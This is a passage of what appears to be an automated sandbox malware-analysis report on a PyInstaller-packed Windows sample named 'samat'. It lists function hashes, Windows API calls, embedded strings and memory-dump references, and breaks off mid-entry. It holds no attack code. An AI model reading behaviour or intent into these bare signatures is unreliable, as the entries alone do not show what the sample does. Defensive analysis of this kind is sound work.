                                                                                                                                                                                                                                                                                      • API ID: Err_$ClearDeallocObject_String$AttrCallCallable_CheckObject
                                                                                                                                                                                                                                                                                      • String ID: Expected a socket object or numeric socket handle$fileno
                                                                                                                                                                                                                                                                                      • API String ID: 994754094-511972153
                                                                                                                                                                                                                                                                                      • Opcode ID: 7b3fa4a733cc4a24dd089f9560dc52097b810a406d96155e0d7f2db213339288
                                                                                                                                                                                                                                                                                      • Instruction ID: c2b5bb92a16273428190a763720d6dbf37e2d3d01503a19dd3aeaf335a7ea7d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b3fa4a733cc4a24dd089f9560dc52097b810a406d96155e0d7f2db213339288
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21F822E18B4292FB458F6AE95423D62A1AF49FD8F488071EB1E477F6DE3CE4458701
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dealloc$Object_$AttrCallImportImport_MethodModuleStringTuple_
                                                                                                                                                                                                                                                                                      • String ID: TimeZoneInfo$utc$win32timezone
                                                                                                                                                                                                                                                                                      • API String ID: 4031171350-3909237026
                                                                                                                                                                                                                                                                                      • Opcode ID: 1639c5302ffb4b87e894b55701020ee97428cbbd91a9955a819a0ce4ffca2fd5
                                                                                                                                                                                                                                                                                      • Instruction ID: fc9bd51a51c1b03b2633d0a68006a57e8ca0517324d2176766838f28a2b393e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1639c5302ffb4b87e894b55701020ee97428cbbd91a9955a819a0ce4ffca2fd5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0421E732E09B4282FB558B59E95427C23A0AF49FE1F884035DB0E067B2EF3CE440C304
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 349153199-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 31d8e522e61a33cf479bf52350be3450eaa8bff41c9a3cd264d2142d6b397c0f
                                                                                                                                                                                                                                                                                      • Instruction ID: 283bfa55f77b2c9eb0c85dd4faf18d78e3c6242ad104a9777e95888380726e4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31d8e522e61a33cf479bf52350be3450eaa8bff41c9a3cd264d2142d6b397c0f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3816921E1C28387FA54AB6EA4412B976A0AF96BC2F544035DB4D87796DF3CF8478708
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$DeallocFormatStringfreemalloc
                                                                                                                                                                                                                                                                                      • String ID: Sequence of dwords cannot be None$Unable to allocate %d bytes
                                                                                                                                                                                                                                                                                      • API String ID: 3558336878-651347692
                                                                                                                                                                                                                                                                                      • Opcode ID: fcb0ab8fe880c01fc9c4e7ef5ed6a4521f4b799ff651dcb487074c39814b8e6a
                                                                                                                                                                                                                                                                                      • Instruction ID: 2f2140b6fe512a2ec34ed25647bc072f6d3677743c37a07658071ff62b318e69
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcb0ab8fe880c01fc9c4e7ef5ed6a4521f4b799ff651dcb487074c39814b8e6a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B041E232A09B4286EB14CF5AA44423C63A4BF89FD4F494572EB5D43BB5EE3CE486D704
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFatalFuncValue$AllocLocalState_Thread
                                                                                                                                                                                                                                                                                      • String ID: Can not setup thread state, as have no interpreter state$Out of memory allocating thread state.$PyWinThreadState_Ensure
                                                                                                                                                                                                                                                                                      • API String ID: 1925565299-3250566352
                                                                                                                                                                                                                                                                                      • Opcode ID: 1cac388a50adace923c6ae1d37d3e8f41fd299e6d5f024e93c89565b812c4a96
                                                                                                                                                                                                                                                                                      • Instruction ID: 094a7758461ed6b508186b727d5650e60d20b482d7289a6c75d6c65bb8df52d4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cac388a50adace923c6ae1d37d3e8f41fd299e6d5f024e93c89565b812c4a96
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF110936A09B0692EB488B59E89426D23B0BF48FC8F840535D70D422B4EE7CA5998700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a94a1b793212a6b0b17cef60065daf4d81db9c63eb3fba2a5528fff43d401e3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0612C663F0C24386FB64BA14D9163B9F65AFB40750FC44137D6A946AC8DFBCE5848B22
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                      • Instruction ID: f235075364ba54f1f8c0bf505dd7a2df8deb66df97d2d849682a01aa40e59752
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC127363F0C18385FB646B14E856779E6A9FB40750FD84033E69A46DC4DFBCE480AB62
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wassert$memcpy
                                                                                                                                                                                                                                                                                      • String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
                                                                                                                                                                                                                                                                                      • API String ID: 4292997394-722309440
                                                                                                                                                                                                                                                                                      • Opcode ID: d39dd8ff127fcd6812d8991013f514968d842da6ae2888197d778fac17dca971
                                                                                                                                                                                                                                                                                      • Instruction ID: f525bbe3a4cb853b7149903374c8349b2bae2c2f1d2361bbda5363b6427b9d6e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d39dd8ff127fcd6812d8991013f514968d842da6ae2888197d778fac17dca971
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E461D172E0868787FA218F28E4446B973A1FB997C5F504231CB8D23655EF3CE58AC748
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                      • Opcode ID: 468a76a4cb26e22acb17f3c3bd12dc52913c62a662c8255ac5cb6751174899c7
                                                                                                                                                                                                                                                                                      • Instruction ID: 6dbcc13cc60ab29eda98f8d574c6f0b47032779822d3011bcfdf55b575bbdc6b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 468a76a4cb26e22acb17f3c3bd12dc52913c62a662c8255ac5cb6751174899c7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11415C22B0869286EB10FB11AC067B9A398BF84BC4FD44433EE4C47795DEBCE501D762
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C8704
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C870A
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C874C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8830: GetEnvironmentVariableW.KERNEL32(00007FF7E12C388E), ref: 00007FF7E12C8867
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7E12C8889
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12D8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8251
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                                      • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                                                      • Instruction ID: b0f671e3da96fe24b91e5f5725e33ce6cb05d2544f8ab813874516cf45b85df0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6441A312B1964245FB15F725AC5B3BA9258AF847C4FC18133EE0D477D6EEBCE445C222
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Buffer_Err_Release$BufferFormatFreeMem_Object_String
                                                                                                                                                                                                                                                                                      • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                                                      • API String ID: 1675121998-686265896
                                                                                                                                                                                                                                                                                      • Opcode ID: f330a7b27ad2e46ddd567d8aaf1c1d2df901e711178c835d73696d74e6b5d538
                                                                                                                                                                                                                                                                                      • Instruction ID: 1938dac5fc7ec6b87ef27f7ff0d1754e40016fb705de7187362783a1142c2799
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f330a7b27ad2e46ddd567d8aaf1c1d2df901e711178c835d73696d74e6b5d538
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B931E722A19B4686EB548F69E44033C2360FF44FD4F945032EB5E866B6DF3CE895C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeallocObject_$AttrBuildCallSizeStringTuple_Value
                                                                                                                                                                                                                                                                                      • String ID: (s)$strftime
                                                                                                                                                                                                                                                                                      • API String ID: 4125559156-1254993691
                                                                                                                                                                                                                                                                                      • Opcode ID: 705837201b98d33591091aae69fea6291c16dfc55d7ca099a681a7f42eb1c854
                                                                                                                                                                                                                                                                                      • Instruction ID: 47409ee73a1312cabc485ec1469d13683f87bf41e50a910804597283d198ff7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 705837201b98d33591091aae69fea6291c16dfc55d7ca099a681a7f42eb1c854
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53110A26E09B4286FB558F5AA95837D63A1AF45FD4F885034DB0D07BBAEF3CE4418704
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                                                      • String ID: (ii)$:GetSecurityDescriptorControl$GetSecurityDescriptorControl$GetSecurityDescriptorControl - invalid sd
                                                                                                                                                                                                                                                                                      • API String ID: 1292091245-2499011972
                                                                                                                                                                                                                                                                                      • Opcode ID: 0c79a85f94f1c090c5a74baff4f4abb4b723d10cf59a6917a5b5309dfcd3027e
                                                                                                                                                                                                                                                                                      • Instruction ID: 069250f45ba10541c33bc54d228a3c48a03bbac3f29f6139766550484fb0feed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c79a85f94f1c090c5a74baff4f4abb4b723d10cf59a6917a5b5309dfcd3027e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09015693F2874282FB549B69B8400BD2351EF95FC5F485035DB0E426B6EE3CD995C710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                      • Instruction ID: b80047ece2a6c09095f5d7f99eb1595d97a9f815f1859d40cf0a1c13094bcf88
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AD1A272B0874186EB20AF25D8423ADBBA8FB44798F900136DF4D57795DF78E180C752
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
                                                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7E12C2D99
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
